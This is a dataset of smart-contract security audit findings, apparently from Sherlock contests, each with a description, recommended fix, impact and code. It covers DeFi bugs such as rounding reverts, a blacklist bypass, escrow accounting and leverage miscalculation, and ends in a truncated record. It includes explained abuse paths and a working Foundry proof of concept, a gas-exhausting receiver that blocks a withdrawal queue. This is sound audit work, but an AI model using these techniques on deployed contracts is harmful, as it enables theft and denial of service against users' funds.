cost for fulfilling the order when they claim the order to retrieve the swapped tokens. 
When the order is fulfilled, the swapped tokens will be sent to and stored in the `LimitOrderRegistry` contract.\\nHowever, in the event that the value of the swapped tokens crash (e.g., Terra's LUNA crash), it makes more economic sense for the users to abandon (similar to defaulting in traditional finance) the orders without claiming the worthless tokens to avoid paying the more expensive fee to the owner.\\nAs a result, many users will choose not to claim the orders, which result in the owner being unable to recoup back the gas fee the owner has already paid for automating the fulfillment of the orders, incurring loss and bad debt.чConsider collecting the fee in advance based on a rough estimation of the expected gas fee. When the users claim the order, any excess fee will be refunded, or any deficit will be collected from the users.\\nIn this case, if many users choose to abandon the orders, the owner will not incur any significant losses.чOwners might be unable to recoup back the gas fee the owner has already paid for automating the fulfillment of the orders, incurring loss and bad debt.ч```\\nFile: LimitOrderRegistry.sol\\n function claimOrder(uint128 batchId, address user) external payable returns (ERC20, uint256) {\\n..SNIP..\\n // Transfer fee in.\\n address sender = _msgSender();\\n if (msg.value >= userClaim.feePerUser) {\\n // refund if necessary.\\n uint256 refund = msg.value - userClaim.feePerUser;\\n if (refund > 0) sender.safeTransferETH(refund);\\n } else {\\n WRAPPED_NATIVE.safeTransferFrom(sender, address(this), userClaim.feePerUser);\\n // If value is non zero send it back to caller.\\n if (msg.value > 0) sender.safeTransferETH(msg.value);\\n }\\n```\\n -Owner unable to collect fulfillment fee from certain users due to revert errorчmediumчCertain users might not be able to call the `claimOrder` function under certain conditions, resulting in the owner being unable to collect fulfillment fees from the users.\\n```\\nFile: LimitOrderRegistry.sol\\n 
function claimOrder(uint128 batchId, address user) external payable returns (ERC20, uint256) {\\n Claim storage userClaim = claim[batchId];\\n if (!userClaim.isReadyForClaim) revert LimitOrderRegistry__OrderNotReadyToClaim(batchId);\\n uint256 depositAmount = batchIdToUserDepositAmount[batchId][user];\\n if (depositAmount == 0) revert LimitOrderRegistry__UserNotFound(user, batchId);\\n\\n // Zero out user balance.\\n delete batchIdToUserDepositAmount[batchId][user];\\n\\n // Calculate owed amount.\\n uint256 totalTokenDeposited;\\n uint256 totalTokenOut;\\n ERC20 tokenOut;\\n\\n // again, remembering that direction == true means that the input token is token0.\\n if (userClaim.direction) {\\n totalTokenDeposited = userClaim.token0Amount;\\n totalTokenOut = userClaim.token1Amount;\\n tokenOut = poolToData[userClaim.pool].token1;\\n } else {\\n totalTokenDeposited = userClaim.token1Amount;\\n totalTokenOut = userClaim.token0Amount;\\n tokenOut = poolToData[userClaim.pool].token0;\\n }\\n\\n uint256 owed = (totalTokenOut * depositAmount) / totalTokenDeposited;\\n\\n // Transfer tokens owed to user.\\n tokenOut.safeTransfer(user, owed);\\n```\\n\\nAssume the following:\\nSHIB has 18 decimals of precision, while USDC has 6.\\nAlice (Small Trader) deposited 10 SHIB while Bob (Big Whale) deposited 100000000 SHIB.\\nThe batch order was fulfilled, and it claimed 9 USDC (totalTokenOut)\\nThe following formula and code compute the number of swapped/claimed USDC tokens a user is entitled to.\\n```\\nowed = (totalTokenOut * depositAmount) / totalTokenDeposited\\nowed = (9 USDC * 10 SHIB) / 100000000 SHIB\\nowed = (9 * 10^6 * 10 * 10^18) / (100000000 * 10^18)\\nowed = (9 * 10^6 * 10) / (100000000)\\nowed = 90000000 / 100000000\\nowed = 0 USDC (Round down)\\n```\\n\\nBased on the above assumptions and computation, Alice will receive zero tokens in return due to a rounding error in Solidity.\\nThe issue will be aggravated under the following conditions:\\nIf the difference in the 
precision between `token0` and `token1` in the pool is larger\\nThe token is a stablecoin, which will attract a lot of liquidity within a small price range (e.g. $0.95 ~ $1.05)\\nThe rounding down to zero is unavoidable in this scenario due to how values are represented. It is not possible to send Alice 0.9 WEI of USDC. The smallest possible amount is 1 WEI.\\nIn this case, it will attempt to transfer a zero amount of `tokenOut,` which might result in a revert as some tokens disallow the transfer of zero value. As a result, when users call the `claimOrder` function, it will revert, and the owner will not be able to collect the fulfillment fee from the users.\\n```\\n // Transfer tokens owed to user.\\n tokenOut.safeTransfer(user, owed);\\n```\\nчConsider only transferring the assets if the amount is more than zero.\\n```\\nuint256 owed = (totalTokenOut * depositAmount) / totalTokenDeposited;\\n\\n// Transfer tokens owed to user.\\n// Remove the line below\\n tokenOut.safeTransfer(user, owed);\\n// Add the line below\\n if (owed > 0) tokenOut.safeTransfer(user, owed);\\n```\\nчWhen a user cannot call the `claimOrder` function due to the revert error, the owner will not be able to collect the fulfillment fee from the user, resulting in a loss of fee for the owner.ч```\\nFile: LimitOrderRegistry.sol\\n function claimOrder(uint128 batchId, address user) external payable returns (ERC20, uint256) {\\n Claim storage userClaim = claim[batchId];\\n if (!userClaim.isReadyForClaim) revert LimitOrderRegistry__OrderNotReadyToClaim(batchId);\\n uint256 depositAmount = batchIdToUserDepositAmount[batchId][user];\\n if (depositAmount == 0) revert LimitOrderRegistry__UserNotFound(user, batchId);\\n\\n // Zero out user balance.\\n delete batchIdToUserDepositAmount[batchId][user];\\n\\n // Calculate owed amount.\\n uint256 totalTokenDeposited;\\n uint256 totalTokenOut;\\n ERC20 tokenOut;\\n\\n // again, remembering that direction == true means that the input token is token0.\\n if 
(userClaim.direction) {\\n totalTokenDeposited = userClaim.token0Amount;\\n totalTokenOut = userClaim.token1Amount;\\n tokenOut = poolToData[userClaim.pool].token1;\\n } else {\\n totalTokenDeposited = userClaim.token1Amount;\\n totalTokenOut = userClaim.token0Amount;\\n tokenOut = poolToData[userClaim.pool].token0;\\n }\\n\\n uint256 owed = (totalTokenOut * depositAmount) / totalTokenDeposited;\\n\\n // Transfer tokens owed to user.\\n tokenOut.safeTransfer(user, owed);\\n```\\n -Bypass the blacklist restriction because the blacklist check is not done when minting or burningчhighчBypass the blacklist restriction because the blacklist check is not done when minting or burning\\nIn the whitepaper:\\nthe protocol emphasis that they implement a blacklist feature for enforcing OFAC, AML and other account security requirements A blacklisted will not able to send or receive tokens\\nthe protocol want to use the whitelist feature to be compliant to not let the blacklisted address send or receive dSahres\\nFor this reason, before token transfer, the protocol check if address from or address to is blacklisted and the blacklisted address can still create buy order or sell order\\n```\\n function _beforeTokenTransfer(address from, address to, uint256) internal virtual override {\\n // Restrictions ignored for minting and burning\\n // If transferRestrictor is not set, no restrictions are applied\\n\\n // @audit\\n // why don't you not apply mint and burn in blacklist?\\n if (from == address(0) || to == address(0) || address(transferRestrictor) == address(0)) {\\n return;\\n }\\n\\n // Check transfer restrictions\\n transferRestrictor.requireNotRestricted(from, to);\\n }\\n```\\n\\nthis is calling\\n```\\nfunction requireNotRestricted(address from, address to) external view virtual {\\n // Check if either account is restricted\\n if (blacklist[from] || blacklist[to]) {\\n revert AccountRestricted();\\n }\\n // Otherwise, do nothing\\n}\\n```\\n\\nbut as we can see, when the 
dShare token is burned or minted, the blacklist does not apply to address(to)\\nthis allows the blacklisted receiver to bypass the blacklist restriction and still send and receive dShares and cash out their dShares\\nbecause the minting dShares is not blacklisted\\na blacklisted user create a buy order with payment token and set the order receiver to a non-blacklisted address\\nthen later when the buy order is filled, the new dShares is transferred and minted to an not-blacklisted address\\nbecause the burning dShares is not blacklisted\\nbefore the user is blacklisted, a user can frontrun the blacklist transaction to create a sell order and transfer the dShares into the OrderProcessor\\nthen later when the sell order is filled, the dShares in burnt from the SellOrderProcess escrow are burnt and the user can receive the payment tokenчIssue Bypass the blacklist restriction because the blacklist check is not done when minting or burning\\nimplement proper check when burning and minting of the dShares to not let user game the blacklist system, checking if the receiver of the dShares is blacklisted when minting, before filling sell order and burn the dShares, check if the requestor of the sell order is blacklisted\\ndo not let blacklisted address create buy order and sell orderчBypass the blacklist restriction because the blacklist check is not done when minting or burningч```\\n function _beforeTokenTransfer(address from, address to, uint256) internal virtual override {\\n // Restrictions ignored for minting and burning\\n // If transferRestrictor is not set, no restrictions are applied\\n\\n // @audit\\n // why don't you not apply mint and burn in blacklist?\\n if (from == address(0) || to == address(0) || address(transferRestrictor) == address(0)) {\\n return;\\n }\\n\\n // Check transfer restrictions\\n transferRestrictor.requireNotRestricted(from, to);\\n }\\n```\\n -Escrow record not cleared on cancellation and order fillчmediumчIn `DirectBuyIssuer.sol`, a market 
buy requires the operator to take the payment token as escrow prior to filling the order. Checks are in place so that the math works out in terms of how much escrow has been taken vs the order's remaining fill amount. However, if the user cancels the order or fills the order, the escrow record is not cleared.\\nThe escrow record will exist as a positive amount which can lead to accounting issues.\\nTake the following example:\\nOperator broadcasts a `takeEscrow()` transaction around the same time that the user calls `requestCancel()` for the order\\nOperator also broadcasts a `cancelOrder()` transaction\\nIf the `cancelOrder()` transaction is mined before the `takeEscrow()` transaction, then the contract will transfer out tokens when it should not be able to.\\n`takeEscrow()` simply checks that the `getOrderEscrow[orderId]` is less than or equal to the requested amount:\\n```\\n bytes32 orderId = getOrderIdFromOrderRequest(orderRequest, salt);\\n uint256 escrow = getOrderEscrow[orderId];\\n if (amount > escrow) revert AmountTooLarge();\\n\\n\\n // Update escrow tracking\\n getOrderEscrow[orderId] = escrow - amount;\\n // Notify escrow taken\\n emit EscrowTaken(orderId, orderRequest.recipient, amount);\\n\\n\\n // Take escrowed payment\\n IERC20(orderRequest.paymentToken).safeTransfer(msg.sender, amount);\\n```\\n\\nCancelling the order does not clear the `getOrderEscrow` record:\\n```\\n function _cancelOrderAccounting(OrderRequest calldata order, bytes32 orderId, OrderState memory orderState)\\n internal\\n virtual\\n override\\n {\\n // Prohibit cancel if escrowed payment has been taken and not returned or filled\\n uint256 escrow = getOrderEscrow[orderId];\\n if (orderState.remainingOrder != escrow) revert UnreturnedEscrow();\\n\\n\\n // Standard buy order accounting\\n super._cancelOrderAccounting(order, orderId, orderState);\\n }\\n}\\n```\\n\\nThis can lead to a good-faith and trusted operator accidentally taking funds from the contract that should not be
able to leave.\\ncoming up with the fact that the transaction does not have a deadline or expiration date:\\nconsider the case below:\\na good-faith operator sends a transaction, takeEscrow\\nthe transaction is pending in the mempool for a long long long time\\nthen the user fires a cancel order request\\nthe operator helps the user cancel the order\\nthe operator sends a transaction to cancel the order\\nthe cancel order transaction lands first\\nthe takeEscrow transaction lands\\nbecause the escrow state is not cleared up, the fund (other user's fund) is taken\\nIt's also worth noting that the operator would not be able to call `returnEscrow()` because the order state has already been cleared by the cancellation. `getRemainingOrder()` would return 0.\\n```\\n function returnEscrow(OrderRequest calldata orderRequest, bytes32 salt, uint256 amount)\\n external\\n onlyRole(OPERATOR_ROLE)\\n {\\n // No nonsense\\n if (amount == 0) revert ZeroValue();\\n // Can only return unused amount\\n bytes32 orderId = getOrderIdFromOrderRequest(orderRequest, salt);\\n uint256 remainingOrder = getRemainingOrder(orderId);\\n uint256 escrow = getOrderEscrow[orderId];\\n // Unused amount = remaining order - remaining escrow\\n if (escrow + amount > remainingOrder) revert AmountTooLarge();\\n```\\nчClear the escrow record upon canceling the order.чIssue Escrow record not cleared on cancellation and order fill\\nInsolvency due to pulling escrow that should not be allowed to be takenч```\\n bytes32 orderId = getOrderIdFromOrderRequest(orderRequest, salt);\\n uint256 escrow = getOrderEscrow[orderId];\\n if (amount > escrow) revert AmountTooLarge();\\n\\n\\n // Update escrow tracking\\n getOrderEscrow[orderId] = escrow - amount;\\n // Notify escrow taken\\n emit EscrowTaken(orderId, orderRequest.recipient, amount);\\n\\n\\n // Take escrowed payment\\n IERC20(orderRequest.paymentToken).safeTransfer(msg.sender, amount);\\n```\\n -Cancellation refunds should return tokens to order creator, not recipientчmediumчWhen an
order is cancelled, the refund is sent to `order.recipient` instead of the order creator because it is the order creator (requestor) pay the payment token for buy order or pay the dShares for sell order\\nAs is the standard in many L1/L2 bridges, cancelled deposits should be returned to the order creator instead of the recipient. In Dinari's current implementation, a refund acts as a transfer with a middle-man.\\nSimply, the `_cancelOrderAccounting()` function returns the refund to the order.recipient:\\n```\\n function _cancelOrderAccounting(OrderRequest calldata orderRequest, bytes32 orderId, OrderState memory orderState)\\n internal\\n virtual\\n override\\n {\\n // rest of code\\n\\n uint256 refund = orderState.remainingOrder + feeState.remainingPercentageFees;\\n\\n // rest of code\\n\\n if (refund + feeState.feesEarned == orderRequest.quantityIn) {\\n _closeOrder(orderId, orderRequest.paymentToken, 0);\\n // Refund full payment\\n refund = orderRequest.quantityIn;\\n } else {\\n // Otherwise close order and transfer fees\\n _closeOrder(orderId, orderRequest.paymentToken, feeState.feesEarned);\\n }\\n\\n\\n // Return escrow\\n IERC20(orderRequest.paymentToken).safeTransfer(orderRequest.recipient, refund);\\n }\\n```\\n\\nRefunds should be returned to the order creator in cases where the input recipient was an incorrect address or simply the user changed their mind prior to the order being filled.чReturn the funds to the order creator, not the recipient.чPotential for irreversible loss of funds\\nInability to truly cancel orderч```\\n function _cancelOrderAccounting(OrderRequest calldata orderRequest, bytes32 orderId, OrderState memory orderState)\\n internal\\n virtual\\n override\\n {\\n // rest of code\\n\\n uint256 refund = orderState.remainingOrder + feeState.remainingPercentageFees;\\n\\n // rest of code\\n\\n if (refund + feeState.feesEarned == orderRequest.quantityIn) {\\n _closeOrder(orderId, orderRequest.paymentToken, 0);\\n // Refund full payment\\n 
refund = orderRequest.quantityIn;\\n } else {\\n // Otherwise close order and transfer fees\\n _closeOrder(orderId, orderRequest.paymentToken, feeState.feesEarned);\\n }\\n\\n\\n // Return escrow\\n IERC20(orderRequest.paymentToken).safeTransfer(orderRequest.recipient, refund);\\n }\\n```\\n -`reduce_position` doesn't update margin mapping correctlyчhighч`reduce_position` function decrease the margin amount of the position but doesn't add it back to the user's margin mapping, making it impossible to withdraw the margin.\\nAfter selling some position tokens back against debt tokens using `reduce_position` function, `debt_shares` and `margin_amount` are reduced proportionally to keep leverage the same as before:\\nVault.vy#L313-L330\\n```\\ndebt_amount: uint256 = self._debt(_position_uid)\\n margin_debt_ratio: uint256 = position.margin_amount * PRECISION / debt_amount\\n\\n\\n amount_out_received: uint256 = self._swap(\\n position.position_token, position.debt_token, _reduce_by_amount, min_amount_out\\n )\\n\\n\\n # reduce margin and debt, keep leverage as before\\n reduce_margin_by_amount: uint256 = (\\n amount_out_received * margin_debt_ratio / PRECISION\\n )\\n reduce_debt_by_amount: uint256 = amount_out_received - reduce_margin_by_amount\\n\\n\\n position.margin_amount -= reduce_margin_by_amount\\n\\n\\n burnt_debt_shares: uint256 = self._repay(position.debt_token, reduce_debt_by_amount)\\n position.debt_shares -= burnt_debt_shares\\n position.position_amount -= _reduce_by_amount\\n```\\n\\nHowever, even though some of the margin have been paid back (position.margin_amount has been reduced), `self.margin[position.account][position.debt_token]` mapping hasn't been updated by adding `reduce_margin_by_amount` which would allow the user to withdraw his margin.чConsider modifying the code like this:\\n```\\n reduce_debt_by_amount: uint256 = amount_out_received - reduce_margin_by_amount\\n\\n\\n position.margin_amount -= reduce_margin_by_amount\\n+ 
self.margin[position.account][position.debt_token] += reduce_margin_by_amount\\n\\n burnt_debt_shares: uint256 = self._repay(position.debt_token, reduce_debt_by_amount)\\n position.debt_shares -= burnt_debt_shares\\n position.position_amount -= _reduce_by_amount\\n```\\nчUsers will lose their margin tokens.ч```\\ndebt_amount: uint256 = self._debt(_position_uid)\\n margin_debt_ratio: uint256 = position.margin_amount * PRECISION / debt_amount\\n\\n\\n amount_out_received: uint256 = self._swap(\\n position.position_token, position.debt_token, _reduce_by_amount, min_amount_out\\n )\\n\\n\\n # reduce margin and debt, keep leverage as before\\n reduce_margin_by_amount: uint256 = (\\n amount_out_received * margin_debt_ratio / PRECISION\\n )\\n reduce_debt_by_amount: uint256 = amount_out_received - reduce_margin_by_amount\\n\\n\\n position.margin_amount -= reduce_margin_by_amount\\n\\n\\n burnt_debt_shares: uint256 = self._repay(position.debt_token, reduce_debt_by_amount)\\n position.debt_shares -= burnt_debt_shares\\n position.position_amount -= _reduce_by_amount\\n```\\n -Leverage calculation is wrongчhighчLeverage calculation is wrong which will lead to unfair liquidations or over leveraged positions depending on price movements.\\n`_calculate_leverage` miscalculate the leverage by using `_debt_value + _margin_value` as numerator instead of `_position_value` :\\nVault.vy#L465-L477\\n```\\ndef _calculate_leverage(\\n _position_value: uint256, _debt_value: uint256, _margin_value: uint256\\n) -> uint256:\\n if _position_value <= _debt_value:\\n # bad debt\\n return max_value(uint256)\\n\\n\\n return (\\n PRECISION\\n * (_debt_value + _margin_value)\\n / (_position_value - _debt_value)\\n / PRECISION\\n )\\n```\\n\\nThe three inputs of the function `_position_value`, `_debt_value` and `_margin_value` are all determined by a chainlink oracle price feed. `_debt_value` represents the value of the position's debt share converted to debt amount in USD. 
`_margin_value` represents the current value of the position's initial margin amount in USD. `_position_value` represents the current value of the position's initial position amount in USD.\\nThe problem with the above calculation is that `_debt_value + _margin_value` does not represent the value of the position. The leverage is the ratio between the current value of the position and the current margin value. `_position_value - _debt_value` is correct and is the current margin value, but `_debt_value + _margin_value` doesn't represent the current value of the position since there is no guarantee that the debt token and the position token have correlated price movements.\\nExample: debt token: ETH, position token: BTC.\\nAlice uses 1 ETH of margin to borrow 14 ETH (2k USD/ETH) and get 1 BTC (30k USD/BTC) of position token. Leverage is 14.\\nThe next day, the price of ETH in USD is still 2k USD/ETH but BTC price in USD went down from 30k to 29k USD/BTC. Leverage is now (_position_value == 29k) / (_position_value == 29k - _debt_value == 28k) = 29, instead of what is calculated in the contract: (_debt_value == 28k + _margin_value == 2k) / (_position_value == 29k - _debt_value == 28k) = 30.чConsider modifying the code like this:\\n```\\ndef _calculate_leverage(\\n _position_value: uint256, _debt_value: uint256, _margin_value: uint256\\n) -> uint256:\\n if _position_value <= _debt_value:\\n # bad debt\\n return max_value(uint256)\\n\\n\\n return (\\n PRECISION\\n- * (_debt_value + _margin_value)\\n+ * (_position_value)\\n / (_position_value - _debt_value)\\n / PRECISION\\n )\\n```\\n\\nEscalate for 10 USDC. My report shows why the current used formula is wrong as it does not take into account that debt tokens and position tokens are not necessarily tokens with correlated prices. The duplicate #100 shows in another way that the formula fail to calculate the leverage of a position correctly. 
The impact is the same, but my report highlights `_debt_value + _margin_value != _position_value`, the same way that the debt against a house is not equal to the market value of this house (also described in another way in #156). The definition of leverage used in the code is not correct and will lead to unfair liquidations or over leveraged positions, which is definitely high severity.\\nUnexpected and unfair liquidation could cause loss to users. Since the issue roots from the formula, the loss could be long term, resulting in accumulated fund loss for users, and can be deemed as \"material loss of funds\".\\nBased on the above, high severity might be appropriate.\\nUnstoppable-DeFi\\nhrishibhat\\n@Unstoppable-DeFi based on the above escalation it seems to be a high issue. Is there any other reason this should not be a high-severity issue?\\nhrishibhat\\nResult: High Has duplicates Considering this issue a valid high\\nsherlock-admin2\\nEscalations have been resolved successfully!\\nEscalation status:\\ntwicek: acceptedчLeverage calculation is wrong which will lead to unfair liquidations or over leveraged positions depending on price movements.ч```\\ndef _calculate_leverage(\\n _position_value: uint256, _debt_value: uint256, _margin_value: uint256\\n) -> uint256:\\n if _position_value <= _debt_value:\\n # bad debt\\n return max_value(uint256)\\n\\n\\n return (\\n PRECISION\\n * (_debt_value + _margin_value)\\n / (_position_value - _debt_value)\\n / PRECISION\\n )\\n```\\n -Interest calculated is amplified by a multiple of 1000 in `_debt_interest_since_last_update`чhighчInterest calculated in the `_debt_interest_since_last_update` function is amplified by a multiple of 1000, hence can completely brick the system and debt calculation.
Because we divide by PERCENTAGE_BASE instead of PERCENTAGE_BASE_HIGH which has more precision and which is used in utilization calculation.\\nThe following function calculates the interest accrued over a certain interval:\\n```\\ndef _debt_interest_since_last_update(_debt_token: address) -> uint256:\\n\\n return (\\n\\n (block.timestamp - self.last_debt_update[_debt_token])* self._current_interest_per_second(_debt_token)\\n * self.total_debt_amount[_debt_token]\\n / PERCENTAGE_BASE \\n / PRECISION\\n )\\n```\\n\\nBut the results from the above function are amplified by a factor of 1000 due to the reason that the interest per second as per the test file is calculated as follows:\\n```\\n # accordingly the current interest per year should be 3% so 3_00_000\\n # per second that is (300000*10^18)/(365*24*60*60)\\n expected_interest_per_second = 9512937595129375\\n\\n assert (\\n expected_interest_per_second\\n == vault_configured.internal._current_interest_per_second(usdc.address)\\n )\\n```\\n\\nSo yearly interest has the precision of 5 as it is calculated using utilization rate and `PERCENTAGE_BASE_HIGH_PRECISION` is used which has precision of 5, and per second has the precision of 18, so final value has the precision of 23.\\nInterest per second has precision = 23.\\nBut if we look at the code:\\n```\\n (block.timestamp - self.last_debt_update[_debt_token])* self._current_interest_per_second(_debt_token)\\n * self.total_debt_amount[_debt_token]\\n / PERCENTAGE_BASE \\n / PRECISION\\n```\\n\\nWe divide by PERCENTAGE_BASE that is = 100_00 = precision of => 2 And then by PRECISION = 1e18 => precision of 18.
So an accumulated precision of 20, whereas we should have divided by a value precise to 23 to match the numerator.\\nWhereas we should have divided by PERCENTAGE_BASE_HIGH instead of PERCENTAGE_BASE\\nHence the results are amplified by an enormous multiple of a thousand.чUse PERCENTAGE_BASE_HIGH in division instead of PERCENTAGE_BASE.\\nEscalate for 10 USDC\\nThis should be high as described impact in the given submission and the duplicate too.\\nA magnitude of 1000 times of interest can be deemed as \"material loss of funds\".\\n141345\\nEscalate for 10 USDC The wrong calculation of interest rates will cause a direct loss of funds to users. This should definitely be high severity.\\nSame as above\\nhrishibhat\\nResult: High Has duplicates Considering this a valid high\\nsherlock-admin2\\nEscalations have been resolved successfully!\\nEscalation status:\\nNabeel-javaid: accepted\\ntwicek: acceptedчInterest is amplified too much, which impacts the total debt calculation and bricks the whole leverage, liquidation and share mechanism.\\nNote: Dev confirmed that the values being used in the tests are the values that will be used in production.чч```\\ndef _debt_interest_since_last_update(_debt_token: address) -> uint256:\\n\\n return (\\n\\n (block.timestamp - self.last_debt_update[_debt_token])* self._current_interest_per_second(_debt_token)\\n * self.total_debt_amount[_debt_token]\\n / PERCENTAGE_BASE \\n / PRECISION\\n )\\n```\\n -Hedgers are not incentivized to respond to user's closing requestsчmediumчHedgers could intentionally force the users to close the positions themselves via the `forceClosePosition` and charge a spread to earn more, which results in the users closing at a worse price, leading to a loss of profit for them.\\nHow `fillCloseRequest` function works?\\nFor a Long position, when PartyB (Hedger) calls the `fillCloseRequest` function to fill a close position under normal circumstances, the hedger cannot charge a spread because the hedger has to close at the
user's requested close price (quote.requestedClosePrice),\\nIf the hedger decides to close at a higher price, it is permissible by the function, but the hedger will lose more, and the users will gain more because the users' profit is computed based on `long profit = closing price - opening price`.\\nUnder normal circumstances, most users will set the requested close price (quote.requestedClosePrice) close to the market price most of the time.\\nIn short, the `fillCloseRequest` function requires the hedger to match or exceed the user' requested price. The hedger cannot close at a price below the user's requested price in order to charge a spread.\\n```\\nfunction fillCloseRequest(\\n..SNIP..\\n if (quote.positionType == PositionType.LONG) {\\n require(\\n closedPrice >= quote.requestedClosePrice,\\n \"PartyBFacet: Closed price isn't valid\"\\n )\\n```\\n\\nHow `forceClosePosition` function works?\\nFor a Long position, the `forceCloseGapRatio` will allow the hedger to charge a spread from the user's requested price (quote.requestedClosePrice) when the user (PartyA) attempts to force close the position.\\nThe `upnlSig.price` is the market price and `quote.requestedClosePrice` is the price users ask to close at. 
By having the `forceCloseGapRatio`, assuming that `forceCloseGapRatio` is 5%, this will create a spread between the two prices (upnlSig.price and quote.requestedClosePrice) that represent a cost that the users (PartyA) need to \"pay\" in order to force close a position.\\n```\\nfunction forceClosePosition(uint256 quoteId, PairUpnlAndPriceSig memory upnlSig) internal {\\n..SNIP..\\n if (quote.positionType == PositionType.LONG) {\\n require(\\n upnlSig.price >=\\n quote.requestedClosePrice +\\n (quote.requestedClosePrice * maLayout.forceCloseGapRatio) /\\n 1e18,\\n \"PartyAFacet: Requested close price not reached\"\\n );\\n ..SNIP..\\n LibQuote.closeQuote(quote, filledAmount, quote.requestedClosePrice);\\n```\\n\\nIssue with current design\\nAssume a hedger ignores the user's close request. In this case, the users (PartyA) have to call the `forceClosePosition` function by themselves to close the position and pay a spread.\\nThe hedgers can abuse this mechanic to their benefit. Assuming the users (PartyA) ask to close a LONG position at a fair value, and the hedgers respond by calling the `fillCloseRequest` to close it. In this case, the hedgers won't be able to charge a spread because the hedgers are forced to close at a price equal to or higher than the user's asking closing price (quote.requestedClosePrice).\\nHowever, if the hedger chooses to ignore the user's close request, this will force the user to call the `forceClosePosition,` and the user will have to pay a spread to the hedgers due to the gap ratio. In this case, the hedgers will benefit more due to the spread.\\nIn the long run, the hedgers will be incentivized to ignore users' close requests.чHedgers should not be entitled to charge a spread within the `forceClosePosition` function because some hedgers might intentionally choose not to respond to user requests in order to force the users to close the position themselves. 
In addition, hedgers are incentivized to force users to close the position themselves as the `forceClosePosition` function allows them the charge a spread.\\nWithin the `forceClosePosition` function, consider removing the gap ratio to remove the spread and fill the position at the market price (upnlSig.price).\\n```\\n function forceClosePosition(uint256 quoteId, PairUpnlAndPriceSig memory upnlSig) internal {\\n..SNIP..\\n if (quote.positionType == PositionType.LONG) {\\n require(\\n upnlSig.price >=\\n// Add the line below\\n quote.requestedClosePrice, \\n// Remove the line below\\n quote.requestedClosePrice // Add the line below\\n\\n// Remove the line below\\n (quote.requestedClosePrice * maLayout.forceCloseGapRatio) /\\n// Remove the line below\\n 1e18,\\n \"PartyAFacet: Requested close price not reached\"\\n );\\n } else {\\n require(\\n upnlSig.price <=\\n// Add the line below\\n quote.requestedClosePrice,\\n// Remove the line below\\n quote.requestedClosePrice // Remove the line below\\n\\n// Remove the line below\\n (quote.requestedClosePrice * maLayout.forceCloseGapRatio) /\\n// Remove the line below\\n 1e18,\\n \"PartyAFacet: Requested close price not reached\"\\n );\\n }\\n..SNIP..\\n// Remove the line below\\n LibQuote.closeQuote(quote, filledAmount, quote.requestedClosePrice);\\n// Add the line below\\n LibQuote.closeQuote(quote, filledAmount, upnlSig.price);\\n }\\n```\\n\\nFor long-term improvement to the protocol, assuming that the user's requested price is of fair value:\\nHedger should be penalized for not responding to the user's closing request in a timely manner; OR\\nHegder should be incentivized to respond to the user's closing request. For instance, they are entitled to charge a spread if they respond to user closing requests.чThe hedgers will be incentivized to ignore users' close requests, resulting in the users having to wait for the cooldown before being able to force close a position themselves. 
The time spent waiting could potentially lead to a loss of opportunity cost for the users.\\nIn addition, hedgers could intentionally force the users to close the positions themselves via the `forceClosePosition` and charge a spread to earn more, which results in the users closing at a worse price, leading to a loss of profit for them.ч```\\nfunction fillCloseRequest(\\n..SNIP..\\n if (quote.positionType == PositionType.LONG) {\\n require(\\n closedPrice >= quote.requestedClosePrice,\\n \"PartyBFacet: Closed price isn't valid\"\\n )\\n```\\n -ProcessWithdrawals is still DOS-ableчhighчDOS on process withdrawals were reported in the previous code4rena audit however the fix does not actually stop DOS, it only makes it more expensive. There is a much cheaper way to DOS the withdrawal queue - that is by specifying the `usr` to be a smart contract that consumes all the gas.\\n```\\n// SPDX-License-Identifier: UNLICENSED\\npragma solidity 0.8.9;\\nimport \"./Utils.sol\";\\n\\ncontract MaliciousReceiver {\\n uint256 public gas;\\n receive() payable external {\\n gas = gasleft();\\n for(uint256 i = 0; i < 150000; i++) {} // 140k iteration uses about 28m gas. 
150k uses slightly over 30m.\\n }\\n}\\n\\ncontract VUSDWithReceiveTest is Utils {\\n event WithdrawalFailed(address indexed trader, uint amount, bytes data);\\n\\n function setUp() public {\\n setupContracts();\\n }\\n\\n function test_CannotProcessWithdrawals(uint128 amount) public {\\n MaliciousReceiver r = new MaliciousReceiver();\\n\\n vm.assume(amount >= 5e6);\\n // mint vusd for this contract\\n mintVusd(address(this), amount);\\n // alice and bob also mint vusd\\n mintVusd(alice, amount);\\n mintVusd(bob, amount);\\n\\n // withdraw husd\\n husd.withdraw(amount); // first withdraw in the array\\n vm.prank(alice);\\n husd.withdraw(amount);\\n vm.prank(bob); // Bob is the malicious user and he wants to withdraw the VUSD to his smart contract\\n husd.withdrawTo(address(r), amount);\\n\\n assertEq(husd.withdrawalQLength(), 3);\\n assertEq(husd.start(), 0);\\n\\n husd.processWithdrawals(); // This doesn't fail on foundry because foundry's gas limit is way higher than ethereum's. \\n\\n uint256 ethereumSoftGasLimit = 30_000_000;\\n assertGt(r.gas(), ethereumSoftGasLimit); // You can only transfer at most 63/64 gas to an external call and the fact that the recorded amt of gas is > 30m shows that processWithdrawals will always revert when called on mainnet. \\n }\\n\\n receive() payable external {\\n assertEq(msg.sender, address(husd));\\n }\\n}\\n```\\n\\nCopy and paste this file into the test/foundry folder and run it.\\nThe test will not fail because foundry has a very high gas limit but you can see from the test that the amount of gas that was recorded in the malicious contract is higher than 30m (which is the current gas limit on ethereum). If you ran the test by specifying the —gas-limit i.e. 
`forge test -vvv --match-path test/foundry/VUSDRevert.t.sol --gas-limit 30000000` The test will fail with `Reason: EvmError: OutOfGas` because there is not enough gas to transfer to the malicious contract to run 150k iterations.чFrom best recommendation to worst\\nRemove the queue and `withdraw` the assets immediately when `withdraw` is called.\\nAllow users to process withdrawals by specifying the index index\\nAllow the admin to remove these bad withdrawals from the queue\\nAllow the admin to adjust the start position to skip these bad withdrawals.чUsers will lose their funds and have their VUSD burnt forever because nobody is able to process any withdrawals.ч```\\n// SPDX-License-Identifier: UNLICENSED\\npragma solidity 0.8.9;\\nimport \"./Utils.sol\";\\n\\ncontract MaliciousReceiver {\\n uint256 public gas;\\n receive() payable external {\\n gas = gasleft();\\n for(uint256 i = 0; i < 150000; i++) {} // 140k iteration uses about 28m gas. 150k uses slightly over 30m.\\n }\\n}\\n\\ncontract VUSDWithReceiveTest is Utils {\\n event WithdrawalFailed(address indexed trader, uint amount, bytes data);\\n\\n function setUp() public {\\n setupContracts();\\n }\\n\\n function test_CannotProcessWithdrawals(uint128 amount) public {\\n MaliciousReceiver r = new MaliciousReceiver();\\n\\n vm.assume(amount >= 5e6);\\n // mint vusd for this contract\\n mintVusd(address(this), amount);\\n // alice and bob also mint vusd\\n mintVusd(alice, amount);\\n mintVusd(bob, amount);\\n\\n // withdraw husd\\n 